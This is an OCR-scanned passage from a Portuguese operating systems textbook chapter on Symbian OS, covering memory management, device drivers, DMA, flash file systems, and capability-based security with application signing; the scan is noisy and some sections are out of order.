Conceitos como paginas de memória yirtuai criadasa par¬ 
tii de ąuadros de memória lisica, memória vinual paginada 
por demanda e reposięao dinamiea de paginas sao com¬ 
bi na dos de forma a dar a ilusao de recursos de memória 
aparentemente ilimitados, nos quais a memória ffsica e sus- 
tentada e estendida por espaęos de armazenamento como 
o do disco rfgido. 

Como em um sistema operacional de usogeral eficien- 
te, o Symbian tambem deve oferecer um modelo de geren¬ 
ciamento de memória. Emretamo, como o armazenamen¬ 
to nos smarlphones normalmcnte c limitado, o modelo de 
memória e restrito e nao usa um esquema de memória vir- 
mal ou de espaęo de troca para seu gerenciamento. Entre- 
tanto, ele usa a maioria dos outros mecanismos discutidos, 
induindo as MMUs de hardware. 


12.4.11 Sistemas sem memória virtual 

Muitos sistemas dc computador nao tern os reąuisitos 
nccessarios para oferecer inna memória yirtual madura 
c o rccurso de paginaęao por dcmanda. O unico armaze- 
namento disponwcl para os sistemas operacionais nessas 
piataformas e a memória, ja que des nao vem coin unida- 
des de disco, Por isso, muitos sistemas menores, dc PD As 
a smarlphones e disposhivos ponateis de mVeI mais alto, 
nao dao su porte a memória virtual com paginaęao por de- 
manda. 

Considcre o espaęo dc memória usado na maioria das 
piata formas de dispositivoś pequcnos. Nonnalmente, esses 
sistemas tein dois tipos de armazenamento: RAM e memó¬ 
ria Eash. A RAM armazena o código do sistema operacional 
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(a ser usado quando o sistema se inicia); a memória flash e 
usada para a memória operacional e tambem para o arma- 
zenamento pcrmaneme (dc arquivos). ć comum podermos 
adicionar memóiias flash exiras em um dispositivo (como 
urn cartao SD — mure digitał) e cssa memória e usada ape- 
nas pa ra a r ina zen amcnt o p e nna ncnt c. 

A ausenda de memória virtual com paginaęao por de¬ 
ma uda nao implica a ausenda de gerenciamento de me¬ 
mória. Na vcrdade, a maioria das plalaformas menores csni 
em disposilivos de hardware que induem muitas das ca- 
racieristicas de gerenciamento dos sistemas maiores. Isso 
inchii paginaęao, traduęao de endereęos e abstraęao de en¬ 
dereęos ffsicos e viriuais. A ausenda de memória virtual 
signifka apenas que as paginas na o po dcm ser trocadas na 
memória e enviadas para armazenamento externo, mas a 
abstraęao das paginas de memória ainda e usada. As pagi¬ 
nas sao subsiitufdas, mas as que estao sendo trocadas sao 
apcnas descartadas. Isso quer dizer que somenle as paginas 
dc código podem ser stibsLilmdas, urna vez que apcnas das 
sao sustentadas pela memória flash. 

O gerencianiemo de memória consiste nas seguintes 
tarę fas: 

1. Gerenciamento do tamanho das aplicaęoes: o 

tamanho de uma aplicaęao — código c dados — tern 
u ni deko decisivo em como a memória e usada. Ha- 
bilidade e disciplina sao reąuisitos para criar um soft¬ 
ware pequeno. A tendmcia a usar um projeto orien- 
tado a objelos pode ser um obstaculo (mais objetos 
implicam maisalocaęao di na mi ca de memória, o que 
implica um heap de tamanho rnaior). A maioria dos 
sistemas operacionais dc plalaformas peąuenas desa- 
conselha o uso de ligaęao esiitica entre os módulos. 

2. Gerenciamento do heap: o lieap — espaęo para 
a alocaęao dinamica de memória — deve ser geren- 
ciado com rigor em piataforinas menores. O espa¬ 
ęo do heap geralmente e limitado nas plalaformas 
desse tipo para foręar os programadores a recuperar 
e reutilizar esse espaęo o maximo posstvcL AvenUi- 
rar-se alem dos iimites do heap resulta em erros na 
alocaęao dc memória. 

3. Execuęao local: plalaformas sem unidades de 
disco normalmentc dao su porte a execuęao local. 
Isso significa quc a memória flash e mapeada no 
espaęo de endereęamento virtual e os pro gra mas 
podem ser executados diielamenie dela sem que 
anies tenham de ser copiados para a RAM. Isso re- 
duz o tempo de carrcgamemo para zero, pemiitin- 
do a aplicaęao inidalizar instantaneamente, e nao 
reąuer ocupar urna RAM escassa. 

4. Carregar DLLs: a escolha de quando carregar DLLs 
pode afeiar a percepęao do desetnpenho de um sis¬ 
tema. Carregar lodas as DLLs para a memória quaLi¬ 
do uma aplicaęao esta iniciando, por exemplo, e 
mais acdtavel do que carrega-tas esporadicamcnte 
d u ram ę a execuęao. Os usuarios aceitarao melhor 


o tempo de espera na inicializaęao do que atrasos 
duraiUc a cxecuęao. Notc quc o carrcgamenLO dc 
algumas DLLs pode nao ser necessarlo. Esse pode 
ser o caso se (a) elas ja estao na memória ou (b) elas 
estao comidas em dispositivos flash externos (nesse 
caso elas podem ser executadas localnieiite), 

5. Transfer&ncia do gerenciamento de memória 
para o hardware: se ha uma MMU disponfvel, ela e 
uLilizada cni sua capaddadc totaL Na vcrdade, quaLi¬ 
to mais funcionalidades pnderem ser colocadas em 
uma MMU, melhor sera o desempenho do sistema, 

Mcsmo com a regra de execuęao no local, piata forma s 
peąuenas ainda prccisam rescrvar memória para a opera- 
ęao do sistema. Essa memória c compartilhada com o ar¬ 
mazenamento permanente e geralmente e gereneiada de 
duas matlciras. Na primeira, uma a horda gem bem simplcs 
e usada por alguns sistemas operacionais e a memória nem 
ebega a ser paginada. Nesses tipos dc sistemas, a irtudan- 
ęa de contexio consiste na alocaęao de espaęo operacional, 
como espaęos de monie, por exemplo, e na divisao desse 
espaęo operacional emre todos os processos. Esse meto¬ 
do ąuasc nao utiliza protcęao emre as arcas de memória 
dos processos e acredita que os processos fimcionam bem 
juntos. O sistema operacional Palm uliliza cssa abordagem 
simplcs no gerenciamento de memória. O segundo metodo 
usa uma abordagem mais disciplinada. Nele, a memória e 
separada cm paginas quc sao alocadas para as solicitaęóes 
operacionais. As paginas sao mantidas em uma lista aberta 
gereneiada pdo sistema operacional c sao alocadas para os 
processos de sistema e de usuario eon formę a necessidade. 
Dessa maiieira (como nao ha memória virtual), quando a 
lisia de paginas esta dieia, o sistema flca sem memória e 
novas alocaęoes nao podem acontecer. O sistema Symbian 
e um exemplo desse segundo metodo, 

_12 .4 .21 Como o Symbian faz 

endereęamento de memória 

Como o Symbian e um sistema operacional de 32 bits, 
os endereęos podem variar ate 4 GB. Ele emprega as mes- 
mas abstraęocs de sistemas maiores, nas quais os programas 
devcm usar endereęos virtuais quc sao mapeados pelo sis¬ 
tema operacional para endereęos ffsicos. Como na maioria 
dos sistemas, o Symbian dividc a memória em paginas vir- 
tuais e quadros ffsicos. O tamanho dc quadro e geralmente 
4 KB, mas pode ser variaveL 

Como pode haver ate 4 GB de memória, um tamanho 
de quadro de 4 KB implica uma tabela de paginas com 
mais de um milhao de entradas. Com memórias de tama¬ 
nho limitado, o Symbian nao pode dedicar 1 MB para a 
tabela de paginas. Alem disso, os tempos de acesso e busca 
em uma tabela tao grandę causariam problemas para o 
sistema. Para resolver isso, o Symbian adota uma estra- 
tegia de tabela de paginas em dois ruvcis, como mostra- 
do na Figura 12.2. O primeiro nfvel, chamado diretório 
de pagina, oferecc uma ligaęao com o segundo mvd e e 
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endereęo virtua! 

| 1 OOOtMM 0 1 100 0 00001 Q1 000001 1 001 1 1 



I Figura 12.2 O sistema Symbian asa uma tabeta de paginas de dois nrveis para reduzir o tempo de aoesso ń tabeJa e o armazenamento. 


indexado por u ma poręao do endereęo virtual (os pii - 
meiros 12 bits) * Esse diretório e mamido na memória e 
apontado pc!o TT BR (registrador-base da tabela de 
traduęao — trmislation tahle ba$e register). Urna e ul rada 
do diretório dc paginas apoma para o segundo irivel, que 
e mna coleęao dc labelas de paginas. Essas tabelas ofere- 
ceni ligaęao para unia pagina cspedfica na memória e sao 
indcxadas por uina poręao do endcreęo virmal (os 8 bits 
do meio). Finalmente, a palavra na pagina refcrendada 
e indexada pelos ultimos 12 bits do endereęo virtuaL O 
hardware auxilia no calculo desse mapeamemo de ende- 
reęos virtuais para fisicos. Mesmo que o Symbian nao pos- 
sa comar com a existencia dc qualqncr lipo de assistenria 
de hardware, a maioria das a rqlutetu ras para as quais dc 
ć implementado dispoe dc MMUs, O processador ARM, 
por cxcmplo, tem u ma MMU cxtcnsa, com u ma tabda dc 
tradtięao rapida para aj udar na computaęao dc endereęos, 
Quando uma pagina nao esta na memória, ocorre unia 
condięao de erro, ja que lodas as paginas de memória da 
aplicaęao devem ser carregadas no ato de sua inicializaęao 
(sem paginaęao por demanda). BMotecas carregadas di- 
namicamente sao colocadas na memória explidtamente 
nao por faltas dc paginas, mas por pcąnenos pcdaęos de 
código ligados ao executavel da aplicaęao, 

Apesar da ausenda do recurso de troca, o dmamismo 
da memória no Symbian e surpreendeme. As mudanęas 
dc coniexto das aplicaęóes acomcccm pcla memória e, 
como di to antes, tem sens rcquisiios carregados para aquela 
ąuando sua execuęao e inidada. As paginas de memória 


soliritadas por cada aplicaęao podem ser reąuisitadas estati- 
camente pelo sistema opera ci ona 1 e carregadas para a me¬ 
mória. O espaęo dinamico (para o heap) e limitado c, assim, 
as solicitaęoes estaticas podem ser feitas para cle lambem. Os 
ąuadros dc memória sao alocados para paginas a partir de 
uma lista de ąuadros livres; se nao ha quadros dispomvcis, 
um erro condldonal c apresentado. Os ąuadros de memória 
que estao sen do utilizados nao podem ser substituidos por 
paginas vindas dc uma aplicaęao que esta chcgando, mes- 
mo que os ąuadros sejam para uma aplicaęao quc nao esta 
sendo executada no momcmo. Issoacontccc porąue nao ha 
troca no Symbian c nao havcria lugar para onde copiar as 
paginas que fossem trocadas, ja que a memória Nash (muito 
limitada) e apenas para os arquivos do usuario. 

Ha, na verdade, quatro versoes diferentes de modeios 
dc implementaęao dc memória que o Symbian usa. Cada 
modclo fol projetado para certo tipo dc configuraęao de 
hardware. Uma brcvc lista deles pode ser vista a seguir: 

1. Modelo em movimento: esse modclo foi projeta¬ 
do para as primciras arąuiteturas ARM. O diretório 
dc paginas no modclo em movimento tem 4 KB e 
entrada dc 4 bytes, dando ao diretório o tamanho 
dc 16 KB. As paginas de memória sao protegidas 
por bits de acesso associados a ąuadros de memó¬ 
ria e pela classificaęao dos acessos de memória com 
um domfnio. Os dommios sao gravados no diretório 
de paginas e a MMU gara me permissóes de aces¬ 
so a cada um deles. Ainda que a segmentaęao nao 
seja expliritamente usada, ha uma organizaęao na 
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disiribuięao da memória: uma seęao de dados para 
os dados alocados pelo usuario e uma seęao de nu- 
deo para dados alocados pelo micleo. 

2. Modelo multiplo: cssc modelo foi desenvolvido 
para utilizaęao a partii da versao 6 da arquitetura 
ARM. JMessas versoes, a MMU e diferente da usada 
nas versoes ameriores. Por exemplo, o dketório de 
paginas rcąuer tratamento difcrcme, ja que pode 
ser sępa rado em dois pedaęos, cada um rcferindo-se 
a um conjunta distinto de tabelas de paginas. Es- 
scs dois sao usados para tabelas de paginas do usua- 
rio e tabelas dc pagi nas do nudeo. A nova versao 
da arąuitetura ARM revisou e aprimorou os bks dc 
accsso cm cada quadro dc pagina c dcsvalorizou o 
conceito de doinmio. 

3. Modelo di ret o: o modelo de memória dii eta assume 
que nao ha nenhuma MMU. Esse modelo raramen- 
te e utUizado e nao e permitido nos sinarlphones. 
A fal ta dc uma MMU causaria problemas serios dc 
desempenbo. Ele e lilii para ambientes de deseń vol- 
vi men to nos quais a MMU tenlia de ser desabilitada 
por algum motivo. 

4. Modelo emulador; csse modelo foi deserwoUi- 
do para dar suporte ao emulador do Symbian no 
Windows. Ele tem a Ig u mas restrięóes sc compa ra¬ 
do a versao voltada para uma CPU reaL O errnila- 
dor e execuiado em um unico processo do Windows 
e, por isso, o espaęo de ertdereęamenio e restrito a 
2 GB, e nao a 4 GB. Toda memória oferecida ao emu¬ 
lador e acessfvel a qualquer processo do Symbian e, 
dessa forma, nao ha proteęao de memória dispoiiivel. 
As biblioiecas do Symbian sao ofereddas no forma to 
de DLLs do Windows e r por essa razao, o Windows 
trata a alocaęao e o gerendamento de memória. 


12.5 


Entrada e saida 


A estrutura dc entrada/safda do Symbian se cspelha 
nas de outros projetos de sistcmas operadonais, Esta seęao 
vai apontar algumas das prindpais caractensticas usadas 
pelo Symbian para focar sua piata fomia-alvo. 


12.5.11 Driver$ de dispositivos 

No Symbian, os drivers de dispositivos sao executados 
como código prmlegiado dc nucleo para dar accsso ao códi- 
go do nfvel do usuario a os rmirsos protegidos de sistema. 
Como no Limix e no Windows, drivers de dispositivos re- 
presentam o acesso do software ao hardware. 

No Symbian, um driver de dispositWo c divjdido cm 
dois nivcis: um driver de disposiiivo lógico (LDD — logi- 
cal drnce drmr) c um drivcr dc disposit[vo fisico (FDD — 
physkal dmce drwcr), O LDD representa uma interface com 
camadas a!tas de software, enąuanto o FDD interage di- 
retamenie com o hardware. Nessc modelo, o LDD pode 


usar a mesma implementaęao para uma classe espedfica 
de dispositivos, enquanto o FDD muda a cada disposkivo. 
G Symbian lorncce muitos UDDs-padrao. Algumas vezes, 
quando o hardware e bern padrao ou comum, o Symbian 
tambem fornece um FDD. 

Comidere o exemplo de um dispositivo serial. O 
Symbian define um LDD serial generico que, por sua vez, 
dcfmc as interfaces do programa para acessar o dispositi- 
vo serial. O LDD fornece unia imerface com o PDD, que 
oferece a interface com dispositivos seriais. O PDD im- 
plementa o b uff er e os mecanismos de controle de fluxo 
n ccc s sari os para aj ud ar a reguła r as diferenęas dc vcloci- 
dade entre a CPU c os dispositivos seriais. Um unico LDD 
(o lado do usuario) pode se conectar a qualquer um dos 
PDDs quc podem ser usados na exccucao de dispositivos 
scriais, Em um smartphone espedfreo, isso pode induir 
uma porta de infravermcllio ou ale mesmo uma porta RS- 
232. Esses sao dois bons exemp!os; eles usam o mesmo 
LDD serial, mas PDDs diferentes. 

Se ainda nao existirem na memória, LDDs e PDDs 
podem ser carregados dinamicameme por programas do 
usuario, Sao ofcrecidos retursos de programaęao que per- 
mitem veriftcar se ha necessidadc de carregamento. 

12.5.21 Extensdes de nudeo 

As extensocs dc nudeo sao drivers dc dispositivos 
carregados pelo Symbian cm sua midalizaęao. Por serem car- 
regadas na inidalizaęao, as extensócs sao casos especiais 
qiic precisam ser tratados dc forma diferente dos drivers dc 
dispositivos norma is. 

As cxtensóes dc niicJco sao diferentes de outros dri- 
vers de dispositiyos. A maioria delas e implementada como 
LDDs, acompanhadas de PDDs, e e carregada quando soii- 
dtada pelas aplicaęoes do espaęo do usuario, As extens5es 
de nudeo sao carregadas na inidalizaęao do sistema e espe- 
cificamente dirccionadas a alguns dispositivos, geralmente 
nao acompanhadas dos PDDs. 

As extensoes de nucleo sao montadas durante o proce- 
dimento de inidalizaęao e carregadas e inidadas logo após 
a inidalizaęao do es ca łon a don Elas implememam funęóes 
eruciais para os sistcmas operadonais — como servięos 
DMA, gerendamento de monitor, controle de ba tramem 
to para dispositiras perifericos (por exemp!o, o barramento 
USB) —e sao ofereddas por dois motivos« Primeiro, sc en- 
caixam nos esguemas abstratos de orientaęaoa objęłoś quc 
vimos como caracterfstica do projeto de micronucleo. Se- 
gundo, permitem que varias platafonnas onde o Symbian 
funciona cxecutem drivcrs dc dispositivos cspecfHcos que 
habilitam os dispositivos de hardware de cada uma delas 
sem necessidadc de recompilaęao do nucleo. 

12.5.51 Acesso direto a memória 

Os drivers de dispositivos freąuentemente se utilizam 
do DMA (direetmmory access — acesso direto a memória) c 
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o Symbian suporta o uso de hardware de DMA, que eon- 
sisie em urn controlador de conjuntos de eanais de DMA. 
Ca da canal oferece u ma linka direęao de comunicaęao cn- 
tre a meniória e mn dispositivo e, por conta disso, a trans- 
missao bidiredonal de dados rcquer dois eanais de DMA. 
No mmlmo urn par de eanais dc DMA e dcdicado ao con- 
trolador LCD dc tela* Alćm desses, muitas plataformas ofe- 
recern certo nu mero de eanais gerais de DM A. 

U ma vez que uin disposidvo tenlia iransmilido dados 
para a inemória, urna interrupęao dc sistema e disparada. 
O servięo de DMA ofereddo pelo hardware de DMA e usa- 
do pelo FDD para o dispositivo transmissor — a parte do 
driver dc dispositivo que cna a imcrface com o hardware, 
Entre o FDD e o controlador de DMA, o Symbian cria duas 
ca ma das dc software: uma ca mad a de DMA de software e 
uma extensao do nudeo que faz a interface com o hard¬ 
ware de DMA. A ca ma da de DMA lambem e subdMdida cm 
uma carnada i n dependente de piata forma e outra dependente 
de piat a forma. Como uma extensao do nudeo, a ca ma da dc 
DMA ć um dos primdros drivers de dispositivos a serem ini- 
ciados pelo nudeo duranie o procedimento de inidaHzaęao. 

O suporte para o DMA e complicado por unia razao 
especial O Symbian da suporte a varias configuraędes de 
hardware diferentes e nao e possivel assumir uma confi- 
guraęao unica de DMA. A interface com o hardware de 
DMA e padronizada entre as piataformas e fomedda na ca- 
mada independente de plataforma. A carnada dependente 
dc plataforma c a exicnsao do nudeo sao forneddas pelo 
labricantc, tratando o hardware de DM A da mesma forma 
que o Symbian trata qualquer outro dispositivo: como um 
driver de dispositivo de componemes LDD e PDD* Como o 
hardware de DMA e visto como um dispositivo r essa forma 
de implememaęao de suporte fazsentido, pois aćompanha 
o modo como o Symbian da suporte a todos os dispositivos. 

_ 12.5.41 Caso especial: midia de 

armazenamento 

No Symbian, os drivers de midia sao uma forma espe- 
dal de FDD usados exclusivameiite pelo servidor de arqui- 
vos para implemcntar o acesso dos disposltivos das mfdias 
dc armazenamento* Em razao dc os smariphones poderem 
contcr midia lixa e removfvel, os dispositivos dc midia de- 
vcm reconhcccr c dar suporte a uma serie dc formas de 
armazenamento, O suporte do Symbian para midia indtii 
um LDD-padrao c uma interface API para usuarios. 

O servidor de arquivos do Symbian pode dar suporte 
a ate 26 unidades diferentes ao mesmo tempo, Como no 
Windows, as unidades locais sao diferenciadas peias letras 
que as identificam* 


threads no sistema. Com os objetos ativos, as chamadas 
bloąueantes sao tratadas pelo sistema operacional, e nao 
pelos processos. Os objetos ativos sao coordenados por um 
unico escalonador e implemmtados em um unieo thread. 

Quando usa uma chamada bloąueante de E/S, o obję¬ 
ło ativo avisa ao sistema operacional e se suspende. Quando 
a chamada bloąueante c conclutda, o sistema operacional 
acorda o processo suspenso e de continua a execuęao como 
se uma funęao tivessc Ihe retornado dados. Para os objetos 
ativos H a diferenęa e uma ąuesiao de perspectiva: des nao po- 
dem chamaruma funęao e esperar pelo retorno de um valor. 
Em vez disso, devem chamar uma funęao especial c deixar 
que essa funęao estabeleęa o bloąueio de E/S, mas retorne 
imedia ta menie. O sistema operacional assume a espera* 

12.5.61 Midia removivel 

As midi as removiveis represemam um dilema iniercs- 
sante para os projetistas de sistemas operacionais. Quando 
um carlao SD e inserido cm seu lei tor, cle e considerado um 
dispositivo como todos os oiuros. Ele precisa de comrola- 
dor, driver, estrutura de barramento e, provavelmente, vai 
se comunicar com a CPU via DMA. Todavia, o falc de esia 
ser uma midia removlvel e um próbie ma serio para esse 
modelo de dispositivos: como o sistema operacional deteela 
a inseręao e a remoęao, e como o modelo deve acomodar 
a ausenda do cartao? Para complicar ainda mais, alguns 
leitores podem acomodar mais de um lipo de dispositivo, 
Porexemplo, carroes SD, miniSD (com adaptador) e Multi- 
MediaCards u sam o mesmo lipo de entrada. 

O Symbian inicia su a i mpkmeotaęao de mldias remo- 
viveis a partir das similaridades. Cada tipo tern caractensti- 
cas comuns a todas: 

1. Todos os dispositivos devem ser inseridos e removidos, 

2. Todas as mldias removiveis podem ser retiradas en- 
ąuanto estao sen do utilizadas. 

3. Cada midia pode reportar suas capacidades. 

4. Cartbes incompatweis devem ser rcjeitados. 

5. Cada cartao precisa de energia* 

Para dar suporte as mldias removfveis, o Symbian ofe¬ 
rece comroladores de software que gerenciam cada carlao 
suportado. Os comroladores trabalham com drivers de dis- 
posilivos especificos para cada cartao, tambem no software, 
Um objęto soąuete e criado ąuando o cartao e inserido e 
passa a atuar como o canal por onde os dados iransitam, 
Para acomodar as rnudanęas, o Symbian oferece urna serie 
de evemos que ocorrem ąuando acomece uma alieraęao de 
estado. Os drivers de dispositivos sao eon figli rad os como 
objetos alivos para ouvir e responder a esses eventos. 


12,5,51 BEoqueando E/S 

O Symbian lida com bloąueio dc E/S por meio de ob¬ 
jetos ativos. Os projetistas pcrcebcram que o peso de todos 
os threads esperando por um evento de E/S afeta os outros 


12.6 


Sistemas de armazenamento 


Como todos os sistemas operacionais orientados a ob¬ 
jetos, o Symbian possui um sistema dc arquivos. Vamos 
dcscrcve-lo a seguir* 
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_12-6-1J Sistemas de arquivo$ para 

dispositivos móveis 

Em termos de sistemas de arquivos c armazenamento, 
os sistemas operacionais dos telefones móveis tern muitos 
dos requisitos dos sistemas de PCs desktop. Muitos sao im- 
plememados em ambientes 32-bits, a maioria permite aos 
usuarios nomear os arquivos arbilrariamente e muitos gra- 
vam varios arquivos que precisam de algurna forma orga- 
nizada de estru utrą. Isso signifiea que om sistema de arqui- 
vos hierarąuico baseado cm diretórios e desejavel. Ainda 
que os projetistas dc sistemas operacionais móveis tenham 
rmtiias aliemativas de sistemas de arquivo$, u ma caraete- 
nstica influencia mais na escoJlia: a maioria dos telefones 
móvris dispoc de midias de armazenamento passfvcis de 
compartilhamento com oambiente Windows, 

Se os sistemas de telefones móveis nao utilizassem 
midias rcmovfvci.s, qua1qucr sistema dc arquivos $crviria. 
Contudo, para os sistemas que usam memória flash, ha eir- 
amstancias especiais a serem consideradas. Os tamanhos 
de bioco normalnienie variam de 512 bytes a 2.048 bytes. 
A memória flash nao permite sobieserever a memória; 
e prcciso primeiro apagar, depois cscrever. A tern disso, a 
unidade de apagamento ć particularmemc grosseira: nao e 
possfvd apagar bytes individuais, e blocos inteiros precisam 
serapagados a cada vez, O tempo gasto no apagamento das 
memórias flash e relativamente longo. 

Para a com od ar essas caractensticas, a memória flash 
irabalha mellior quando ha sistemas de arquivos especiah 
mente projetados, que escrevem sobre as midias de forma 
abrangentc e lidam com os longos penodos de apagamen- 
to. O conceito basico e que, quando o dispositivo de ar¬ 
mazenamento flash esta para ser atu a li za do, o sistema dc 
arquivos vai gravar inna cópia dos dados niodifkados cm 
um bloco novo, atualizar os ponteiros do arquivo c apagar 
o bioco antigo quando tiver tempo, 

Um dos primeiros sistemas de arquivos flash foi o FFS2, 
da Microsoft, para uso no MS-DOS no comeęo dos anos 1990. 
Q tum do, em 1994, o grupo indnstrial PCMCIA aprovou a es- 
pedli ca ęao da Ca ma da de Traduęao Flash para as memórias 
flash, os dispositivos flash podiam parę cer-se com um sistema 
dc arquivos FAT. O Lmux Lambem tem sistema de arquivos 
espedficos, desde o JFFS ao YAFFS (o sistema dc arquivos 
flash com di ario — Jounialmg Flash Fik System — e o outro 
sistema de arqtiivos flash — Yet Amther Flash Fi Hm] System ). 

As piataformas móveis devem, enirelanto, cornpar- 
tilhar a midi a com outros computadores, o que de ma n da 
algum lipo de cornpatibilidade. Geralmente, o sistema de 
arquivos FAT e utilizado. De forma espeafica, o FAT-16 e 
usado (no lugar do FAT-32) por sua tabela dc alocaęao me- 
nor e por seu reduzido uso de arquivos longos. 

12.6.21 o sistema de arquivos do Symbian 

Sendo um sistema operadonal para telefones inicli- 
gentes móvcis, o Symbian precisa iinpiemeniar pelo menos 


o sistema de arquivos FAT-16. Na verdade, ele ofcrece su- 
porte ao FAT-16 e usa esse sistema na maior parte de suas 
midias de armazenamento. 

Todavia, como no sistema de arquivos virtual do Linux, 
a iinplementaęao de serddores de arquivos no Symbian e 
baseada em abstraęao. A oriemaęao a objetos permite que 
objetos que implementam varios sistemas operacionais se- 
jam inseridos no servidor de arquivos do Symbian e, dessa 
forma, possibiłita que varias implementaęoes de sistemas 
de arquivos diferentes sejam milizadas. Ć possivel, indu- 
sivc f quc implementaęoes diferentes coexistam no mesmo 
scrvidor dc arquivos. 

As implementaęóes dos sistemas de arquivos NFS e 
SMB foram criadas para o sistema operadonal Symbian. 

_ 12.6.51 Seguranęa e protecao do sistema 

de arquivos 

A seguranęa nos smartphones e urna variaęao ime- 
ressante da seguranęa em conipuiadores comuns. Ha va- 
rios aspectos dos smartphoncs que lazem da seguranęa 
um desafio. O Symbian fez varias escolhas no projeto 
que o diferenciaram dos sistemas de uso geral dos PCs 
desktop e das outras plataformas de telefones intdigentes, 
Vamos tratar desses aspectos reladonados a seguranęa do 
sistema dc arqihvos e deixarcmos outros assuntos para 
a próxima seęao, 

Considere o ambiente dc smartphones. Eles sao dispo- 
siilvos de um unico usuarlo e nao precisam dc idemificaęao 
para usar, O usuario de um tdefone pode executar aplica- 
ęóes, fazer ligaęoes t acessar redes — tudo scin ideniifica- 
ęao. Nesse ambiente, usar seguranęa baseada em pennis- 
sócs e desafiador, pois a falta de identiflcaęao signifiea que 
apenas um conjunio de permissoes e posswel — o mesmo 
para todo rnundo. 

Em vcz dc recorrera permissoes de usuario, a seguran¬ 
ęa normalnienie se aprovdta de outros tipos dc i n forma- 
ęao. Nas vcrsóes 9 e posieriores do Symbian, as aplicaęóes 
reccbcm um conjunio de capacidadcs quando sao i usta la- 
das. (O processo quc defme quais capacidadcs cada aplica- 
ęao possui e tratado na próxima seęao.) Esse conjunio de 
capacidadcs de urna apiicaęao e corrdacionado ao acesso 
que a aplicaęao solicita. Se o acesso estiver no conjunio de 
capacidadcs da aplicaęao, en tao ele e concedido; do con- 
trario, e negado. A corrdaęao de capacidadcs causa u ma 
sobrecarga — visto que ocorre a cada cha mada de sistema 
quc envolva o accsso a rccursos — mas acabou a sobre- 
carga de correladonar a propriedade de um arquivo a um 
proprietario dearquivos, A substituięao funciona beru para 
o Symbian* 

Ha algumas outras formas dc seguranęa dc arquivos 
no Symbian, como arcas da mfdia de armazenamento 
que nao podcm ser acessadas sem unia capacidadc espe- 
cial, dada somcme as aplicaęóes que i ustalam soflwares no 
sistema, O efcito disso e que novas aplicaęóes, logo após 
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serem instaladas, sao protegidas de acessos que nao provem 
do sislema (o signifita que programas malidosos, como os 
vtnis, nao podem infectar as apiicaęoes instaladas). Alein 
disso, ha algumas areas do sistema de arquivos reservadas 
a cerios lipos dc manipulaęao de dados pelas apiicaęoes (ao 
qne chamamos dc aprisionamento dc dados, conforme vc- 
rcmos na próxima seęao). 

Para o Symbian, o uso das capacidades funcionou tao 
bem ąuamo a posse de arquivos na proteęao dos acessos 
a eles. 


12.7 


Seguranęa no Symbian 


ś dificii tomar o a m bierne dos smariphones seguro. 
Como discutmios anterionnente, eles sao dispositivos de 
nm unico usuario e nao requerem autenticaęao de dados 
para acessar funęoes basicas* Mesmo as funęoes mais com- 
plicadas (como a instalaęao do urna apłicaęao) roąuorcm 
amorizaęao, mas nenhuma amemicaęao. Emrctamo, elas 
sao exccuiadas cm sistemas operadonais complcxos quc 
tom varias fonnas dc manipulaęao dc dados (induindo a 
execuęao de programas). Mamer esses ambientes em segu¬ 
ranęa e complicado. 

O Symbian e um bom exemplo dessa dificuldade. Os 
usuarios esperam que os smartphones que usam o Sym¬ 
bian permitam qualquer tipo dc utilizaęao scm autentica¬ 
ęao — nada de validaęao de usnario on confirmaęao dc 
idemidade, Mesmo assim, como voces devem saber, um 
sistcma complicado como o Symbian tcm muitas capaci¬ 
dades, mas e tambćm suscettvd a vims, vcrmcs c oiuros 
programas malidosos. As rnsoes anteriores a vcrsao 9 do 
Symbian ofereciam seguranęa do tipo porteiro: o sislema 
pedia permissao ao usuario para instaiar todas as apiicaęoes. 
O pressuposio desse projeto era que apenas apiicaęoes ins¬ 
taladas pelos usuarios poderiain causar danos ao sistcma, c 
um usuario informado saberia quais programas pretende- 
ria instaiar c quais eram maliciosos. Ao usnario era eon ba¬ 
da a utilizaęao sabia das apiicaęoes. 

Esse projeto de porteiro tcm mu i t os meritos. Um 
smartplionc novo, poi exemplo, scm apłicaęao alguma ins- 
talada pelo usnario, seria u ni sistcma que podia funaonar 
scm erro. Instaiar apenas as apiicaęoes que o usuario sou- 
besse quc nao eram malidosas manteria a seguranęa do sis¬ 
tema. O problema desse projeto e que os usuarios nem sem- 
pre conhecem todas as ramificaęoes do software que estao 
instalando. Ha vtrus que se disfaręam de programas uleis, 
exccutando funęoes uteis enquanto instalam códigos mali¬ 
ciosos em silcricio. Os usuarios normais nao sao capazes de 
verifkar a confiabilidade de todos os programas disponweis. 

Essa vcrifkaęao dc confianęa motivou um rcplanc- 
j a men to total da seguranęa da plataforma na versao 9 do 
Symbian, que mantem o modelo de porteiro, mas tira do 
usuario a responsabilidade dc verifkar os programas. Gada 
desenvolvedor e responsave) por confirmar o próprio soft¬ 
ware por meio de um processo cbamado assinatura, e o 


sistema verifica a solidtaęao do desenvolvedor. Nem todos 
os programas precisam dessa veriltcaęao; apenas os que 
acessam certas funęoes. Quando urna apłicaęao prccisa de 
assinatura, isso e fciio por unia scquenda dc passos: 

1. O deseńvolvedor do software deve obter urna iden- 
tificaęao por parte de um grupo parceiro reconhcci- 
do. Esses parceiros sao certificados pclo Symbian. 

2. Ouando um desenvolvedor cria urn pacote de soft¬ 
ware e deseja distribuMo, deve submeter o pacote 
para validaęao de um dos parceiros certificados. Ele 
envia su a identificaęao de fonie ccdor, o pacote do 
software e urna lista das for mas como o software 
acessa o sistema. 

3. O grupo parceiro verilica se a lista dc acessos do 
software esta completa e se nao ocorrem outros ti- 
pos de acesso. Se a confirmaęao for bem-sucedida, 
o software e assinado. Isso significa que o pacote de 
instalaęao tein urna poręao espedal de informaęao 
que dctalha para o Symbian o que ele faz e o que 
pode, de fato, lazer. 

4. O pacote dc instalaęao e cnviado de vo)ta ao desen- 
volvedor e pode ser distribuido aos usuarios. Obser- 
ve que esse metodo de pen de de como o software 
acessa os recursos de sistema. O Symbian determina 
que, para que um prograina acesse um recurso do 
sistema, ele deve dispor das capacidades para aces¬ 
sar tal recurso. O conceito dc capacidades esia im¬ 
planta do no nudeo do Symbian. Q u a udo um pro- 
cesso e cria do, parte de sen bloco de controle grava 
as capacidades da das a o proccsso. Sc esse processo 
tent ar execiuar um acesso que nao esta nessa Usta 
de capacidades, o acesso sera negado pelo nudeo. 

O resullado desse processo aparentemente elaborado 
de disiribuięao de apiicaęoes assinadas e um sistema de 
confianęa no qual um porteiro automatizado implantado 
no Symbian pode v cii lica r os programas a serem instala- 
dos. O processo dc instalaęao vcrifica a assinatura do pa- 
cotc e, sc a assinatura for valida, as capacidades garantidas 
ao software sao gravadas e sera o as capacidades dadas pelo 
